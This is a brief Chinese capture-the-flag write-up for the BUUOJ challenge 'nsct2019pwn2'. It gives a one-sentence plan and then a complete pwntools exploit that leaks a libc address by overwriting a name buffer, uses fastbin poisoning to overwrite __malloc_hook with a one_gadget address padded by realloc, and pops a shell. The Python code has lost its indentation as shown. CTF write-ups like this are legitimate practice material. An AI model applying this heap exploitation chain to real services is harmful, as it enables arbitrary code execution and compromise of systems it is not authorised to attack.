思路
先是用leaklibc地址然后fastbin attack打malloc_hook即可
exp:
#!/usr/bin/python2
from pwn import *
local=1
if local==1:
p=process('./nsct2019pwn2')
elf=ELF('./nsct2019pwn2')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',28015)
elf=ELF('./nsct2019pwn2')
libc=elf.libc
def add(size):
p.sendlineafter('6.exit','1')
p.sendlineafter('size',str(size))
def delete():
p.sendlineafter('6.exit','2')
def updatename(name):
p.sendlineafter('6.exit','4')
p.sendafter('name',name)
def show():
p.sendlineafter('6.exit','3')
def edit(note):
p.sendlineafter('6.exit','5')
p.sendlineafter('note',note)
lg=lambda address,data:log.success('%s: '%(address)+hex(data))
def exp():
p.recvuntil('name')
p.sendline('doudou')
add(0x90)
add(0x18)
payload='a'*0x30+'\x10'
updatename(payload)
delete()
add(0x20)
payload='a'*0x30+'\x40'
updatename(payload)
show()
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-libc.sym['__malloc_hook']-0x10
lg('libcbase',libcbase)
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[1]
malloc_hook=libcbase+libc.sym['__malloc_hook']
realloc=libcbase+libc.sym['__libc_realloc']
add(0x68)
delete()
add(0x10)
payload='a'*0x30+'\x40'
updatename(payload)
edit(p64(malloc_hook-0x23))
add(0x68)
add(0x68)
edit('a'*11+p64(one_gadget)+p64(realloc+16))
p.sendlineafter('6.exit','1')
p.sendlineafter('size',str(1))
p.interactive()
if __name__=="__main__":
exp()